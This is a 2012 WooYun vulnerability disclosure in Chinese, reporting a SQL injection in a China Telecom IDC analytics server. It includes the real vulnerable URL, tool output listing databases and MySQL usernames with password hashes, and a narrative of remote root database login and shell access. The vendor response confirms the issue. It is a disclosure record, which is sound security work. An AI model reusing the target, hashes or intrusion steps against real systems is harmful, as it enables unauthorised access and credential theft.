当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-014845

漏洞标题:中国电信某IDC服务器的奇葩漏洞致服务器沦陷

相关厂商:中国电信

漏洞作者: se55i0n

提交时间:2012-11-16 15:40

修复时间:2012-12-31 15:41

公开时间:2012-12-31 15:41

漏洞类型:成功的入侵事件

危害等级:高

自评Rank:12

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2012-11-16: 细节已通知厂商并且等待厂商处理中
2012-11-20: 厂商已经确认,细节仅向厂商公开
2012-11-30: 细节向核心白帽子及相关领域专家公开
2012-12-10: 细节向普通白帽子公开
2012-12-20: 细节向实习白帽子公开
2012-12-31: 细节向公众公开

简要描述:

发现的比较的偶然~入侵的比较愕然~

详细说明:

1.偶然间发现的电信的比较奇葩SQL注入漏洞(貌似是为监控客户网站的访问情况),该情况可能在电信IDC具有通用性,测试地址http://118.123.206.9/preuid.php?uid=2610023800

Web Server: 	Apache/2.2.23 (Unix) PHP/5.4.7
Powered-by: PHP/5.4.7
DB Server: MySQL >=5
Current User: root@localhost
Sql Version: 5.5.28-log
Current DB: analytics
System User: root@localhost
Host Name: localhost.localdomain
Installation dir: /usr
DB User & Pass: root:*70A3DDDA7052B54160CE5B0BF385872C8E470224:localhost
root::localhost.localdomain
root::127.0.0.1
::localhost
::localhost.localdomain
remote:*A4B6157319038724E3560894F7F932C8886EBFCF:%
root:*70A3DDDA7052B54160CE5B0BF385872C8E470224:%
hpflow:*70A3DDDA7052B54160CE5B0BF385872C8E470224:118.123.206.9
web:*A4B6157319038724E3560894F7F932C8886EBFCF:%
hpflow:*70A3DDDA7052B54160CE5B0BF385872C8E470224:118.123.206.7
Data Bases: information_schema
IDC
analytics
mysql
netflow
performance_schema
rec_web
report
report1
test
web
web_test
zj


1.jpg


前台没啥看的~

2.jpg


2.数据库权限还是root,好吧看来数据库允许web,remote用户外连,而且都是相同的弱口令,ok~那就来telnet下看是否默认端口吧~~~
bingo~还是root权限~

5.jpg


3.看看有啥好东西没~貌似监控了不少网站~

3.jpg


4.好吧~既然这样了,不拿shell都对不起自己了~(提权已经没啥意义了)

4.jpg


漏洞证明:

见详细说明

修复方案:

版权声明:转载请注明来源 se55i0n@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:13

确认时间:2012-11-20 13:58

厂商回复:

CNVD确认并复现所述情况,已转由CNCERT四川分中心直接联系当地基础电信运营企业处置。
按完全影响机密性,部分影响可用性、完整性进行评分,基本危害评分8.97(高危),发现技术难度系数1.0(数据库可远程是个大弱点),涉及行业或单位影响危害系数1.4(IDC用户较多),综合rank=8.97*1.4=12.558

最新状态:

暂无